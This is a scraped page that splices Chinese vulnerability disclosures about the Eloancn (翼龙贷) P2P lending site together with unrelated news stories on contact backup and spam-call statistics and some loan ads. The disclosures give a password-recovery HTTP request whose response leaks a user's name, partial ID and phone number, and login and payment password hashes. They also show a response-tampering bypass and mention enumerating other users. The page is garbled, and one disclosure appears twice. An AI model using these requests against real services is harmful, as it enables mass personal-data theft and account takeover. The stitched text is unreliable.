分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
p2p之翼龙贷网设计缺陷泄露所有用户的手机号码/邮箱/身份证号码/姓名/登录密码/支付密码等
还是相当危险的
详细说明：
问题发生在找回密码这里
找回密码，输入手机号码，分析包和返回信息
code 区域POST /memberFindPwd.action?te=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/ Firefox/38.0
Accept: */*
Accept-Language: zh-CN,q=0.8,en-US;q=0.5,q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form- charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: /page/commons/cas/login.jsp?validated=true&service=http%3A%2F%%2Fpage%2Fcommons%2Fcas%2FcloseLoginBox.jsp
Content-Length: 21
Cookie: JSESSIONID=0D43A07C19E; www_eloancn=www1502- _ga=GA1.2.; Hm_lvt_175c73cd488e8cadbb172; Hm_lpvt_175c73cd488e8cadbb780; CNZZDATA5466078=cnzz_eid%3D--%26ntime%3D; sgsa_|0596; sgsa_vt_837=0; IESESSION= _AQB_CloudId=69c171ac-fdd0-40f5-bd6c-5d; pgv_pvi=; pgv_si=s; JMSSESIONID=6D7EB37453EDE5C2-347B-45AB-AAC2-6D; _gat=1
X-Forwarded-For: 8.8.8.8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
loginName=
返回内容：
code 区域{&member&:{&accountName&:&136****7481&,&activecode&:null,&address&:null,&age&:&0&,&ageRange&:&不详&,&area&:&&,&authOutgo&:0.0,&badLoanCAndD&:0.0,&balance&:&16.33&,&balance2&:16.33,&balanceStr&:&16.33&,&borrowPoundage&:0.0,&borrowamount&:&0&,&carGuarantee&:null,&cdate&:,&cityid&:null,&cityname&:null,&countyid&:null,&countyname&:null,&coverEmail&:&u*****@&,&coverIdcard&:&441******30&,&coverMobile&:&136******81&,&coverMobile1&:&1368245****&,&crealName&:null,&creditScore&:null,&creditScoreStr&:&0&,&currentIp&:null,&currentMID&:null,&dueinMoney&:&0&,&dueinMoneyStr&:&0.00&,&email&:&&,&emailOrMobile&:&蔡启忠&,&encodeChar&:null,&encodePassworType&:1,&encodePayChar&:null,&finalLevel&:&HR&,&formatAuthOutgo&:&0.00&,&formatBalance&:&16.33&,&formatBorrowPoundage&:&0.00&,&formatFreezingMoney&:&0&,&formatLendAmount&:&0.00&,&formatLendPoundage&:&0.00&,&formatLoanInsureAmount&:&0.00&,&formatLoanInterest&:&0&,&formatLoanMoney&:&0&,&formatRechargeIncome&:&0.00&,&formatRepayInterest&:&0.00&,&formatRepayMoney&:&0.00&,&formatWithdrawOutgo&:&0.00&,&franchiseecode&:null,&freezingMoney&:&0&,&freezingMoney2&:0.0,&freezingMoneyStr&:&0.00&,&gendar&:null,&greets&:null,&houseGuarantee&:null,&id&:550412,&idcard&:&208230&,&inUseTotalBorrowMoney&:&0&,&instationAmount&:&0.00&,&interestRate&:null,&ip&:null,&isFirst&:&true&,&isFirstWut&:null,&isThreeLead&:null,&lastlogindate&:null,&lendPoundage&:0.0,&lendPoundageStr&:&0.00&,&listphoto&:null,&loanInsureAmount&:0.0,&loanInterest&:0.0,&loanInterestStr&:&0.00&,&loanMoney&:0.0,&loanMoneyStr&:&0.00&,&loginIp&:&&,&managerAccountMoney&:null,&mobile&:&&,&mobileCode&:null,&netEarningsInterest&:&0&,&netEarningsInterest2&:0.0,&netEarningsInterestStr&:&0.00&,&nextRepayDate&:&无还款记录&,&password&:&d50e254cdb07fd5e5ef986a&,&payPWD&:null,&paypassword&:&be540c7f42b0a16adec0a13&,&peopleGuarantee&:null,&photo&:null,&provinceid&:null,&provincename&:null,&pwdlevel&:null,&realQuota&:null,&realQuotaStr&:&0&,&realname&:&蔡启忠&,&realname2&:&*启忠&,&rechargeIncome&:null,&recommendURL&:&NZ690a18ENtdLMjkxyyW%2BQ%3D%3D&,&regiestType&:10,&repayInterest&:null,&repayMoney&:null,&role&:1,&safeLevel&:null,&score&:0,&sessionid&:&6D7EB37453EDE5C2-F46DD86F-DDA9-49FE-BC13-13E&,&setQuestion&:false,&signcode&:null,&singUser&:&BDJJ_SIGN&,&status&:1,&stayStillMoney&:&0&,&strDate&:& 14:37&,&strDate1&:&20&,&strMobile&:&XC7z4n2c7HHnbVMcELYInA==&,&strRole&:&放款人&,&strStatus&:&已激活&,&strType&:&普通会员&,&strlastlogindate&:&欢迎您首次登录&,&tenderFlag&:false,&tenderfinalLevel&:&HR&,&total&:&16.33&,&total2&:0.0,&total2Str&:&0.00&,&totalBorrowMoney&:&0&,&totalLendPrincipal&:&0&,&type&:1,&userArea&:&&,&userDevRecords&:null,&userTotal&:&16.33&,&uuid&:null,&waitMoney&:0.0,&waitMoneyStr&:&0.00&,&waitTotalMoney&:0.0,&waitTotalMoneyStr&:&0.00&,&weiEarRate&:0.0,&withdrawOutgo&:null,&wmpsStatistics&:null,&zqgmze&:&0&,&zqzrze&:&0&},&tip&:null}
用户的手机号码/身份证号码/姓名/登录密码/支付密码
再看看其他用户的：
遍历一下：
漏洞证明：
修复方案：
还是不要忽略的好
版权声明：转载请注明来源 @
厂商回应：
危害等级：中
漏洞Rank：10
确认时间： 19:00
厂商回复：
感谢 @BMa 我们会忙修复
最新状态：
：已经修复，非常感谢作者。
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
过路！你们真利害！羡慕云乌的师傅们。
跪着膜拜啊
@BMa LZ，这个accountName能返回我设置的内容在哪设置的
@Jumbo 抓返回包
intruder-grep extract-add-开头结尾-确认标记-ok
程序员太懒了
登录后才能发表评论，请先手机丢失通讯录没了 360云盘可快速找回
发布时间： 17:43:00
来源：网络
对很多人而言，丢失手机是件很麻烦的事情，除了要去营业厅卡、办卡外，手机内通讯录的丢失也用户头疼不已。南京市民杨女士在逛街的时候把手机丢了，“手机号还能补，但是通讯录无法找回，几百个电话号码就这么没了。
　　对很多人而言，丢失手机是件很麻烦的事情，除了要去营业厅卡、办卡外，手机内通讯录的丢失也用户头疼不已。南京市民杨女士在逛街的时候把手机丢了，“手机号还能补，但是通讯录无法找回，几百个电话号码就这么没了。”如何找回手机内重要信息，省去重新手动更新信息的烦恼呢?今天小编就教大家用360云盘快速找回通讯录，简单几步即可恢复，再也不用为手机丢失而烦恼了。　　手机上安装360云盘的APP 　　先在手机上安装360云盘APP，(/index/download#android)，登陆360账号，点击“其它“可以找到”通讯录备份“功能，出现两个选项，选择”备份“，系统会帮你把手机中的通讯录上传到云端，全部进行备份。　　登陆360云盘找到“其它”选项　　点击“通讯录”备份上传到云端　　现在我们把手机的电话号码已经传到云端了，如果手机丢了或者损坏了，在新手机重新安装好360云盘APP，直接把通讯录从云端恢复到你的新手机就行了。　　按照任意时间点从云端恢复通讯录到手机　　我们还可以查看通讯录的备份记录，里边列举了你备份通讯录的所有时间，可以把手机的通讯录恢复到任意一个时间点，相当于给大家提供了“后悔”的机会，即使把电话号码误删也不用担心。　　另外，用电脑访问360云服务()，可以在电脑上对已经备份的通讯录进行管理，新建联系人，删除联系人，添加绑定的手机，即使你有多个手机号，也不会搞错。　　怎么样?通过以上简单的几个步骤，即使手机出现意外情况，360云盘在云端已经帮你终身保存通讯录，再也不怕找不回电话号码了。　　（原标题：手机丢失通讯录没了 360云盘可快速找回）
本文来源： /zixun/qihushouji_wz98872_p1
手机号：*不能为空
登录密码：*不能为空
图形验证码：
手机验证码：
注册视为同意和 *必须同意服务条款
最近成功案例
张先生，南京人，国家公务人员，打卡工资7000元/月，一直使用信用卡，没有逾期记录，由于信用良好，一周以内贷款3万元
李女士 旅行贷款3000元
李女士是一家普通私营企业的小白领，约好和同事一起台湾旅游，就是平日积蓄不多又不好意思找周围朋友借。在网上看到拍拍贷的广告后打算来尝试一下。在拍拍贷工作人员的协助下，李女士很快就完成了所有手续顺利拿到贷款。
360手机推荐专题分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
p2p之翼龙贷网多处设计缺陷再次泄露所有用户的手机号码/邮箱/身份证号码/姓名/登录密码/支付密码等(3组漏洞打包)
详细说明：
1.p2p之翼龙贷网设计缺陷再次泄露所有用户的手机号码/邮箱/身份证号码/姓名/登录密码/支付密码等
这次是code 区域/page/findpwd_new.jsp?email=null&mobile=131******35&mid=903734&siqu=0
密码找回，手机
漏洞证明：
2.p2p之翼龙网贷某设计缺陷泄露用户身份证/手机号/姓名/支付密码
还是手机客户端，挖呀挖，又找到一个，还是有些影响的，毕竟有密码
3.p2p之翼龙网贷第三次严重设计缺陷影响任意用户
网页版m站与手机版m站是不同的业务逻辑
这里用以前一个漏洞，别人的手机号码来测试
这里的漏洞原理差不多
修改返回值为：{&tip&:&OK&}
修复方案：
版权声明：转载请注明来源 @
厂商回应：
危害等级：中
漏洞Rank：10
确认时间： 11:40
厂商回复：
感谢 @BMa 感谢关注翼龙贷，我们会尽快修复的
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
(3组漏洞打包) 现在只有5个洞了，本来还可以集齐7个召唤神龙的
不过能首页还是蛮好的
各位大神求助下，burpsuite 开代理后无法打开https网站，alter提示没有共同的密码套件，怎么解决
@兔八哥 试试装个jre1.6
@RipZ 果然是jre版本的原因，感谢！
@兔八哥 客气~互相交流~
登录后才能发表评论，请先天极网用户登录
您现在的位置：
2014年手机用户标记骚扰电话号码约2.56亿Yesky天极新闻 16:45
　　【Yesky新闻频道消息】今年1月26日，360互联网安全中心发布的两份报告显示，2014年用户通过卫士标记各类骚扰号码(包括360手机卫士自动检出的响一声电话)约2.56亿个，平均每天被用户标记的各类骚扰电话号码约104万个。
2014年手机用户标记骚扰电话号码约2.56亿
　　从用户标记骚扰电话号码的源分布上看：标记的普通固话号码数最多，占比高达28.3%;其次为移动手机号码占各类骚扰电话号码的27.8%;之后依次为联通手机号码(25.5%)、电信手机号码(13.8%)，400、800电话占比为0.24% 。
　　《报告》显示，在骚扰电话标记数量上三季度最多，占全年的47.5%。在工信部、手机安全厂商以及各大电信运营商的共同努力下，2014年垃圾短信比2013年下降了36.9%。
　　报告显示，2014年4月至12月，360手机卫士共为全国用户拦截各类伪基站短信32.7亿条，平均每天拦截伪基站短信约为1189万条;在十类典型伪基站短信中，360手机卫士总共拦截了1.5亿条“赌博网站”信息。
　　“赌博网站”伪基站短信数量TOP10的城市分别是，广州、珠海、澳门、佛山、深圳、长沙、上海、东莞，海口和中山，其中广东省的城市就有6座，广东省城市占比达到60.7%。
　　《报告》还对2014年手机“中毒”情况进行了统计。2014年全年，360互联网安全中心累计监测到Android用户感染恶意程序3.19亿人次。
　　从地域分布来看，感染手机恶意程序最多的地区为广东省，感染数量占全国感染数量的16.9%;其次为河南(7.14%)、江苏(6.21%)、山东(5.86%)。值得注意的是，广东省的手机恶意程序感染量、骚扰电话新增数量以及垃圾短信拦截量均为全国最高，广东手机安全状况形势较为严峻。
（作者：尹恒责任编辑：尹恒）
IT新闻微信公众平台
第一时间获取新鲜资讯
使用手机扫描左方二维码
您可能想看的内容
大家都在看
ongguanggao.html" -->p2p之翼龙贷网设计缺陷泄露所有用户的手机号码/邮箱/身份证号码/姓名/登录密码/支付密码等
简要描述：
p2p之翼龙贷网设计缺陷泄露所有用户的手机号码/邮箱/身份证号码/姓名/登录密码/支付密码等
还是相当危险的
详细说明：
问题发生在找回密码这里
找回密码，输入手机号码，分析包和返回信息
code 区域POST /memberFindPwd.action?te=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/ Firefox/38.0
Accept: */*
Accept-Language: zh-CN,q=0.8,en-US;q=0.5,q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form- charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: /page/commons/cas/login.jsp?validated=true&service=http%3A%2F%%2Fpage%2Fcommons%2Fcas%2FcloseLoginBox.jsp
Content-Length: 21
Cookie: JSESSIONID=0D43A07C19E; www_eloancn=www1502- _ga=GA1.2.; Hm_lvt_175c73cd488e8cadbb172; Hm_lpvt_175c73cd488e8cadbb780; CNZZDATA5466078=cnzz_eid%3D--%26ntime%3D; sgsa_|0596; sgsa_vt_837=0; IESESSION= _AQB_CloudId=69c171ac-fdd0-40f5-bd6c-5d; pgv_pvi=; pgv_si=s; JMSSESIONID=6D7EB37453EDE5C2-347B-45AB-AAC2-6D; _gat=1
X-Forwarded-For: 8.8.8.8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
loginName=
返回内容：
code 区域{&member&:{&accountName&:&136****7481&,&activecode&:null,&address&:null,&age&:&0&,&ageRange&:&不详&,&area&:&&,&authOutgo&:0.0,&badLoanCAndD&:0.0,&balance&:&16.33&,&balance2&:16.33,&balanceStr&:&16.33&,&borrowPoundage&:0.0,&borrowamount&:&0&,&carGuarantee&:null,&cdate&:,&cityid&:null,&cityname&:null,&countyid&:null,&countyname&:null,&coverEmail&:&u*****@&,&coverIdcard&:&441******30&,&coverMobile&:&136******81&,&coverMobile1&:&1368245****&,&crealName&:null,&creditScore&:null,&creditScoreStr&:&0&,&currentIp&:null,&currentMID&:null,&dueinMoney&:&0&,&dueinMoneyStr&:&0.00&,&email&:&&,&emailOrMobile&:&蔡启忠&,&encodeChar&:null,&encodePassworType&:1,&encodePayChar&:null,&finalLevel&:&HR&,&formatAuthOutgo&:&0.00&,&formatBalance&:&16.33&,&formatBorrowPoundage&:&0.00&,&formatFreezingMoney&:&0&,&formatLendAmount&:&0.00&,&formatLendPoundage&:&0.00&,&formatLoanInsureAmount&:&0.00&,&formatLoanInterest&:&0&,&formatLoanMoney&:&0&,&formatRechargeIncome&:&0.00&,&formatRepayInterest&:&0.00&,&formatRepayMoney&:&0.00&,&formatWithdrawOutgo&:&0.00&,&franchiseecode&:null,&freezingMoney&:&0&,&freezingMoney2&:0.0,&freezingMoneyStr&:&0.00&,&gendar&:null,&greets&:null,&houseGuarantee&:null,&id&:550412,&idcard&:&208230&,&inUseTotalBorrowMoney&:&0&,&instationAmount&:&0.00&,&interestRate&:null,&ip&:null,&isFirst&:&true&,&isFirstWut&:null,&isThreeLead&:null,&lastlogindate&:null,&lendPoundage&:0.0,&lendPoundageStr&:&0.00&,&listphoto&:null,&loanInsureAmount&:0.0,&loanInterest&:0.0,&loanInterestStr&:&0.00&,&loanMoney&:0.0,&loanMoneyStr&:&0.00&,&loginIp&:&&,&managerAccountMoney&:null,&mobile&:&&,&mobileCode&:null,&netEarningsInterest&:&0&,&netEarningsInterest2&:0.0,&netEarningsInterestStr&:&0.00&,&nextRepayDate&:&无还款记录&,&password&:&d50e254cdb07fd5e5ef986a&,&payPWD&:null,&paypassword&:&be540c7f42b0a16adec0a13&,&peopleGuarantee&:null,&photo&:null,&provinceid&:null,&provincename&:null,&pwdlevel&:null,&realQuota&:null,&realQuotaStr&:&0&,&realname&:&蔡启忠&,&realname2&:&*启忠&,&rechargeIncome&:null,&recommendURL&:&NZ690a18ENtdLMjkxyyW%2BQ%3D%3D&,&regiestType&:10,&repayInterest&:null,&repayMoney&:null,&role&:1,&safeLevel&:null,&score&:0,&sessionid&:&6D7EB37453EDE5C2-F46DD86F-DDA9-49FE-BC13-13E&,&setQuestion&:false,&signcode&:null,&singUser&:&BDJJ_SIGN&,&status&:1,&stayStillMoney&:&0&,&strDate&:& 14:37&,&strDate1&:&20&,&strMobile&:&XC7z4n2c7HHnbVMcELYInA==&,&strRole&:&放款人&,&strStatus&:&已激活&,&strType&:&普通会员&,&strlastlogindate&:&欢迎您首次登录&,&tenderFlag&:false,&tenderfinalLevel&:&HR&,&total&:&16.33&,&total2&:0.0,&total2Str&:&0.00&,&totalBorrowMoney&:&0&,&totalLendPrincipal&:&0&,&type&:1,&userArea&:&&,&userDevRecords&:null,&userTotal&:&16.33&,&uuid&:null,&waitMoney&:0.0,&waitMoneyStr&:&0.00&,&waitTotalMoney&:0.0,&waitTotalMoneyStr&:&0.00&,&weiEarRate&:0.0,&withdrawOutgo&:null,&wmpsStatistics&:null,&zqgmze&:&0&,&zqzrze&:&0&},&tip&:null}
用户的手机号码/身份证号码/姓名/登录密码/支付密码
再看看其他用户的：
遍历一下：
漏洞证明：
修复方案：
还是不要忽略的好
版权声明：转载请注明来源 @
若发现bug或建议，欢迎